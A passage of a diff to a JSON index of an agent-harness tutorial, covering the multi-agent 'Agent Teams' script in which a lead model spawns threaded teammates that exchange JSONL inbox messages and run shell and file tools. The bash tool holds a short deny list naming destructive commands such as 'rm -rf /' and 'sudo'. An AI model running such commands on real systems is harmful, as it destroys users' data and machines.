True:\n try:\n query = input(\"\\033[36ms08 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s09", "filename": "s09_agent_teams.py", "title": "Agent Teams", "subtitle": "Teammates + Mailboxes", - "loc": 348, + "loc": 345, "tools": [ "alice", "bash", @@ -492,56 +492,56 @@ "classes": [ { "name": "MessageBus", - "startLine": 77, - "endLine": 118 + "startLine": 78, + "endLine": 119 }, { "name": "TeammateManager", - "startLine": 123, - "endLine": 249 + "startLine": 124, + "endLine": 250 } ], "functions": [ { "name": "_safe_path", "signature": "def _safe_path(p: str)", - "startLine": 254 + "startLine": 255 }, { "name": "_run_bash", "signature": "def _run_bash(command: str)", - "startLine": 261 + "startLine": 262 }, { "name": "_run_read", "signature": "def _run_read(path: str, limit: int = None)", - "startLine": 276 + "startLine": 277 }, { "name": "_run_write", "signature": "def _run_write(path: str, content: str)", - "startLine": 286 + "startLine": 287 }, { "name": "_run_edit", "signature": "def _run_edit(path: str, old_text: str, new_text: str)", - "startLine": 296 + "startLine": 297 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 344 + "startLine": 345 } ], "layer": "collaboration", - "source": "#!/usr/bin/env python3\n\"\"\"\ns09_agent_teams.py - Agent Teams\n\nPersistent named agents with file-based JSONL inboxes. Each teammate runs\nits own agent loop in a separate thread. Communication via append-only inboxes.\n\n Subagent (s04): spawn -> execute -> return summary -> destroyed\n Teammate (s09): spawn -> work -> idle -> work -> ... -> shutdown\n\n .team/config.json .team/inbox/\n +----------------------------+ +------------------+\n | {\"team_name\": \"default\", | | alice.jsonl |\n | \"members\": [ | | bob.jsonl |\n | {\"name\":\"alice\", | | lead.jsonl |\n | \"role\":\"coder\", | +------------------+\n | \"status\":\"idle\"} |\n | ]} | send_message(\"alice\", \"fix bug\"):\n +----------------------------+ open(\"alice.jsonl\", \"a\").write(msg)\n\n read_inbox(\"alice\"):\n spawn_teammate(\"alice\",\"coder\",...) msgs = [json.loads(l) for l in ...]\n | open(\"alice.jsonl\", \"w\").close()\n v return msgs # drain\n Thread: alice Thread: bob\n +------------------+ +------------------+\n | agent_loop | | agent_loop |\n | status: working | | status: idle |\n | ... runs tools | | ... waits ... |\n | status -> idle | | |\n +------------------+ +------------------+\n\n 5 message types (all declared, not all handled here):\n +-------------------------+-----------------------------------+\n | message | Normal text message |\n | broadcast | Sent to all teammates |\n | shutdown_request | Request graceful shutdown (s10) |\n | shutdown_response | Approve/reject shutdown (s10) |\n | plan_approval_response | Approve/reject plan (s10) |\n +-------------------------+-----------------------------------+\n\nKey insight: \"Teammates that can talk to each other.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nimport threading\nimport time\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nTEAM_DIR = WORKDIR / \".team\"\nINBOX_DIR = TEAM_DIR / \"inbox\"\n\nSYSTEM = f\"You are a team lead at {WORKDIR}. Spawn teammates and communicate via inboxes.\"\n\nVALID_MSG_TYPES = {\n \"message\",\n \"broadcast\",\n \"shutdown_request\",\n \"shutdown_response\",\n \"plan_approval_response\",\n}\n\n\n# -- MessageBus: JSONL inbox per teammate --\nclass MessageBus:\n def __init__(self, inbox_dir: Path):\n self.dir = inbox_dir\n self.dir.mkdir(parents=True, exist_ok=True)\n\n def send(self, sender: str, to: str, content: str,\n msg_type: str = \"message\", extra: dict = None) -> str:\n if msg_type not in VALID_MSG_TYPES:\n return f\"Error: Invalid type '{msg_type}'. Valid: {VALID_MSG_TYPES}\"\n msg = {\n \"type\": msg_type,\n \"from\": sender,\n \"content\": content,\n \"timestamp\": time.time(),\n }\n if extra:\n msg.update(extra)\n inbox_path = self.dir / f\"{to}.jsonl\"\n with open(inbox_path, \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n return f\"Sent {msg_type} to {to}\"\n\n def read_inbox(self, name: str) -> list:\n inbox_path = self.dir / f\"{name}.jsonl\"\n if not inbox_path.exists():\n return []\n messages = []\n for line in inbox_path.read_text().strip().splitlines():\n if line:\n messages.append(json.loads(line))\n inbox_path.write_text(\"\")\n return messages\n\n def broadcast(self, sender: str, content: str, teammates: list) -> str:\n count = 0\n for name in teammates:\n if name != sender:\n self.send(sender, name, content, \"broadcast\")\n count += 1\n return f\"Broadcast to {count} teammates\"\n\n\nBUS = MessageBus(INBOX_DIR)\n\n\n# -- TeammateManager: persistent named agents with config.json --\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n\n def _load_config(self) -> dict:\n if self.config_path.exists():\n return json.loads(self.config_path.read_text())\n return {\"team_name\": \"default\", \"members\": []}\n\n def _save_config(self):\n self.config_path.write_text(json.dumps(self.config, indent=2))\n\n def _find_member(self, name: str) -> dict:\n for m in self.config[\"members\"]:\n if m[\"name\"] == name:\n return m\n return None\n\n def spawn(self, name: str, role: str, prompt: str) -> str:\n member = self._find_member(name)\n if member:\n if member[\"status\"] not in (\"idle\", \"shutdown\"):\n return f\"Error: '{name}' is currently {member['status']}\"\n member[\"status\"] = \"working\"\n member[\"role\"] = role\n else:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt),\n daemon=True,\n )\n self.threads[name] = thread\n thread.start()\n return f\"Spawned '{name}' (role: {role})\"\n\n def _teammate_loop(self, name: str, role: str, prompt: str):\n sys_prompt = (\n f\"You are '{name}', role: {role}, at {WORKDIR}. \"\n f\"Use send_message to communicate. Complete your task.\"\n )\n messages = [{\"role\": \"user\", \"content\": prompt}]\n tools = self._teammate_tools()\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n for msg in inbox:\n messages.append({\"role\": \"user\", \"content\": json.dumps(msg)})\n try:\n response = client.messages.create(\n model=MODEL,\n system=sys_prompt,\n messages=messages,\n tools=tools,\n max_tokens=8000,\n )\n except Exception:\n break\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = self._exec(name, block.name, block.input)\n print(f\" [{name}] {block.name}: {str(output)[:120]}\")\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n member = self._find_member(name)\n if member and member[\"status\"] != \"shutdown\":\n member[\"status\"] = \"idle\"\n self._save_config()\n\n def _exec(self, sender: str, tool_name: str, args: dict) -> str:\n # these base tools are unchanged from s02\n if tool_name == \"bash\":\n return _run_bash(args[\"command\"])\n if tool_name == \"read_file\":\n return _run_read(args[\"path\"])\n if tool_name == \"write_file\":\n return _run_write(args[\"path\"], args[\"content\"])\n if tool_name == \"edit_file\":\n return _run_edit(args[\"path\"], args[\"old_text\"], args[\"new_text\"])\n if tool_name == \"send_message\":\n return BUS.send(sender, args[\"to\"], args[\"content\"], args.get(\"msg_type\", \"message\"))\n if tool_name == \"read_inbox\":\n return json.dumps(BUS.read_inbox(sender), indent=2)\n return f\"Unknown tool: {tool_name}\"\n\n def _teammate_tools(self) -> list:\n # these base tools are unchanged from s02\n return [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"send_message\", \"description\": \"Send message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain your inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n ]\n\n def list_all(self) -> str:\n if not self.config[\"members\"]:\n return \"No teammates.\"\n lines = [f\"Team: {self.config['team_name']}\"]\n for m in self.config[\"members\"]:\n lines.append(f\" {m['name']} ({m['role']}): {m['status']}\")\n return \"\\n\".join(lines)\n\n def member_names(self) -> list:\n return [m[\"name\"] for m in self.config[\"members\"]]\n\n\nTEAM = TeammateManager(TEAM_DIR)\n\n\n# -- Base tool implementations (these base tools are unchanged from s02) --\ndef _safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef _run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(\n command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef _run_read(path: str, limit: int = None) -> str:\n try:\n lines = _safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_write(path: str, content: str) -> str:\n try:\n fp = _safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = _safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\n# -- Lead tool dispatch (9 tools) --\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: _run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: _run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: _run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: _run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"spawn_teammate\": lambda **kw: TEAM.spawn(kw[\"name\"], kw[\"role\"], kw[\"prompt\"]),\n \"list_teammates\": lambda **kw: TEAM.list_all(),\n \"send_message\": lambda **kw: BUS.send(\"lead\", kw[\"to\"], kw[\"content\"], kw.get(\"msg_type\", \"message\")),\n \"read_inbox\": lambda **kw: json.dumps(BUS.read_inbox(\"lead\"), indent=2),\n \"broadcast\": lambda **kw: BUS.broadcast(\"lead\", kw[\"content\"], TEAM.member_names()),\n}\n\n# these base tools are unchanged from s02\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"spawn_teammate\", \"description\": \"Spawn a persistent teammate that runs in its own thread.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}, \"role\": {\"type\": \"string\"}, \"prompt\": {\"type\": \"string\"}}, \"required\": [\"name\", \"role\", \"prompt\"]}},\n {\"name\": \"list_teammates\", \"description\": \"List all teammates with name, role, status.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"send_message\", \"description\": \"Send a message to a teammate's inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain the lead's inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"broadcast\", \"description\": \"Send a message to all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"content\": {\"type\": \"string\"}}, \"required\": [\"content\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n inbox = BUS.read_inbox(\"lead\")\n if inbox:\n messages.append({\n \"role\": \"user\",\n \"content\": f\"{json.dumps(inbox, indent=2)}\",\n })\n messages.append({\n \"role\": \"assistant\",\n \"content\": \"Noted inbox messages.\",\n })\n response = client.messages.create(\n model=MODEL,\n system=SYSTEM,\n messages=messages,\n tools=TOOLS,\n max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}: {str(output)[:200]}\")\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms09 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n if query.strip() == \"/team\":\n print(TEAM.list_all())\n continue\n if query.strip() == \"/inbox\":\n print(json.dumps(BUS.read_inbox(\"lead\"), indent=2))\n continue\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: team mailboxes -- multiple models, coordinated through files.\n\"\"\"\ns09_agent_teams.py - Agent Teams\n\nPersistent named agents with file-based JSONL inboxes. Each teammate runs\nits own agent loop in a separate thread. Communication via append-only inboxes.\n\n Subagent (s04): spawn -> execute -> return summary -> destroyed\n Teammate (s09): spawn -> work -> idle -> work -> ... -> shutdown\n\n .team/config.json .team/inbox/\n +----------------------------+ +------------------+\n | {\"team_name\": \"default\", | | alice.jsonl |\n | \"members\": [ | | bob.jsonl |\n | {\"name\":\"alice\", | | lead.jsonl |\n | \"role\":\"coder\", | +------------------+\n | \"status\":\"idle\"} |\n | ]} | send_message(\"alice\", \"fix bug\"):\n +----------------------------+ open(\"alice.jsonl\", \"a\").write(msg)\n\n read_inbox(\"alice\"):\n spawn_teammate(\"alice\",\"coder\",...) msgs = [json.loads(l) for l in ...]\n | open(\"alice.jsonl\", \"w\").close()\n v return msgs # drain\n Thread: alice Thread: bob\n +------------------+ +------------------+\n | agent_loop | | agent_loop |\n | status: working | | status: idle |\n | ... runs tools | | ... waits ... |\n | status -> idle | | |\n +------------------+ +------------------+\n\n 5 message types (all declared, not all handled here):\n +-------------------------+-----------------------------------+\n | message | Normal text message |\n | broadcast | Sent to all teammates |\n | shutdown_request | Request graceful shutdown (s10) |\n | shutdown_response | Approve/reject shutdown (s10) |\n | plan_approval_response | Approve/reject plan (s10) |\n +-------------------------+-----------------------------------+\n\nKey insight: \"Teammates that can talk to each other.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nimport threading\nimport time\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nTEAM_DIR = WORKDIR / \".team\"\nINBOX_DIR = TEAM_DIR / \"inbox\"\n\nSYSTEM = f\"You are a team lead at {WORKDIR}. Spawn teammates and communicate via inboxes.\"\n\nVALID_MSG_TYPES = {\n \"message\",\n \"broadcast\",\n \"shutdown_request\",\n \"shutdown_response\",\n \"plan_approval_response\",\n}\n\n\n# -- MessageBus: JSONL inbox per teammate --\nclass MessageBus:\n def __init__(self, inbox_dir: Path):\n self.dir = inbox_dir\n self.dir.mkdir(parents=True, exist_ok=True)\n\n def send(self, sender: str, to: str, content: str,\n msg_type: str = \"message\", extra: dict = None) -> str:\n if msg_type not in VALID_MSG_TYPES:\n return f\"Error: Invalid type '{msg_type}'. Valid: {VALID_MSG_TYPES}\"\n msg = {\n \"type\": msg_type,\n \"from\": sender,\n \"content\": content,\n \"timestamp\": time.time(),\n }\n if extra:\n msg.update(extra)\n inbox_path = self.dir / f\"{to}.jsonl\"\n with open(inbox_path, \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n return f\"Sent {msg_type} to {to}\"\n\n def read_inbox(self, name: str) -> list:\n inbox_path = self.dir / f\"{name}.jsonl\"\n if not inbox_path.exists():\n return []\n messages = []\n for line in inbox_path.read_text().strip().splitlines():\n if line:\n messages.append(json.loads(line))\n inbox_path.write_text(\"\")\n return messages\n\n def broadcast(self, sender: str, content: str, teammates: list) -> str:\n count = 0\n for name in teammates:\n if name != sender:\n self.send(sender, name, content, \"broadcast\")\n count += 1\n return f\"Broadcast to {count} teammates\"\n\n\nBUS = MessageBus(INBOX_DIR)\n\n\n# -- TeammateManager: persistent named agents with config.json --\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n\n def _load_config(self) -> dict:\n if self.config_path.exists():\n return json.loads(self.config_path.read_text())\n return {\"team_name\": \"default\", \"members\": []}\n\n def _save_config(self):\n self.config_path.write_text(json.dumps(self.config, indent=2))\n\n def _find_member(self, name: str) -> dict:\n for m in self.config[\"members\"]:\n if m[\"name\"] == name:\n return m\n return None\n\n def spawn(self, name: str, role: str, prompt: str) -> str:\n member = self._find_member(name)\n if member:\n if member[\"status\"] not in (\"idle\", \"shutdown\"):\n return f\"Error: '{name}' is currently {member['status']}\"\n member[\"status\"] = \"working\"\n member[\"role\"] = role\n else:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt),\n daemon=True,\n )\n self.threads[name] = thread\n thread.start()\n return f\"Spawned '{name}' (role: {role})\"\n\n def _teammate_loop(self, name: str, role: str, prompt: str):\n sys_prompt = (\n f\"You are '{name}', role: {role}, at {WORKDIR}. \"\n f\"Use send_message to communicate. Complete your task.\"\n )\n messages = [{\"role\": \"user\", \"content\": prompt}]\n tools = self._teammate_tools()\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n for msg in inbox:\n messages.append({\"role\": \"user\", \"content\": json.dumps(msg)})\n try:\n response = client.messages.create(\n model=MODEL,\n system=sys_prompt,\n messages=messages,\n tools=tools,\n max_tokens=8000,\n )\n except Exception:\n break\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = self._exec(name, block.name, block.input)\n print(f\" [{name}] {block.name}: {str(output)[:120]}\")\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n member = self._find_member(name)\n if member and member[\"status\"] != \"shutdown\":\n member[\"status\"] = \"idle\"\n self._save_config()\n\n def _exec(self, sender: str, tool_name: str, args: dict) -> str:\n # these base tools are unchanged from s02\n if tool_name == \"bash\":\n return _run_bash(args[\"command\"])\n if tool_name == \"read_file\":\n return _run_read(args[\"path\"])\n if tool_name == \"write_file\":\n return _run_write(args[\"path\"], args[\"content\"])\n if tool_name == \"edit_file\":\n return _run_edit(args[\"path\"], args[\"old_text\"], args[\"new_text\"])\n if tool_name == \"send_message\":\n return BUS.send(sender, args[\"to\"], args[\"content\"], args.get(\"msg_type\", \"message\"))\n if tool_name == \"read_inbox\":\n return json.dumps(BUS.read_inbox(sender), indent=2)\n return f\"Unknown tool: {tool_name}\"\n\n def _teammate_tools(self) -> list:\n # these base tools are unchanged from s02\n return [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"send_message\", \"description\": \"Send message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain your inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n ]\n\n def list_all(self) -> str:\n if not self.config[\"members\"]:\n return \"No teammates.\"\n lines = [f\"Team: {self.config['team_name']}\"]\n for m in self.config[\"members\"]:\n lines.append(f\" {m['name']} ({m['role']}): {m['status']}\")\n return \"\\n\".join(lines)\n\n def member_names(self) -> list:\n return [m[\"name\"] for m in self.config[\"members\"]]\n\n\nTEAM = TeammateManager(TEAM_DIR)\n\n\n# -- Base tool implementations (these base tools are unchanged from s02) --\ndef _safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef _run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(\n command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef _run_read(path: str, limit: int = None) -> str:\n try:\n lines = _safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_write(path: str, content: str) -> str:\n try:\n fp = _safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = _safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\n# -- Lead tool dispatch (9 tools) --\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: _run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: _run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: _run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: _run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"spawn_teammate\": lambda **kw: TEAM.spawn(kw[\"name\"], kw[\"role\"], kw[\"prompt\"]),\n \"list_teammates\": lambda **kw: TEAM.list_all(),\n \"send_message\": lambda **kw: BUS.send(\"lead\", kw[\"to\"], kw[\"content\"], kw.get(\"msg_type\", \"message\")),\n \"read_inbox\": lambda **kw: json.dumps(BUS.read_inbox(\"lead\"), indent=2),\n \"broadcast\": lambda **kw: BUS.broadcast(\"lead\", kw[\"content\"], TEAM.member_names()),\n}\n\n# these base tools are unchanged from s02\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"spawn_teammate\", \"description\": \"Spawn a persistent teammate that runs in its own thread.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}, \"role\": {\"type\": \"string\"}, \"prompt\": {\"type\": \"string\"}}, \"required\": [\"name\", \"role\", \"prompt\"]}},\n {\"name\": \"list_teammates\", \"description\": \"List all teammates with name, role, status.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"send_message\", \"description\": \"Send a message to a teammate's inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain the lead's inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"broadcast\", \"description\": \"Send a message to all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"content\": {\"type\": \"string\"}}, \"required\": [\"content\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n inbox = BUS.read_inbox(\"lead\")\n if inbox:\n messages.append({\n \"role\": \"user\",\n \"content\": f\"{json.dumps(inbox, indent=2)}\",\n })\n response = client.messages.create(\n model=MODEL,\n system=SYSTEM,\n messages=messages,\n tools=TOOLS,\n max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms09 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n if query.strip() == \"/team\":\n print(TEAM.list_all())\n continue\n if query.strip() == \"/inbox\":\n print(json.dumps(BUS.read_inbox(\"lead\"), indent=2))\n continue\n 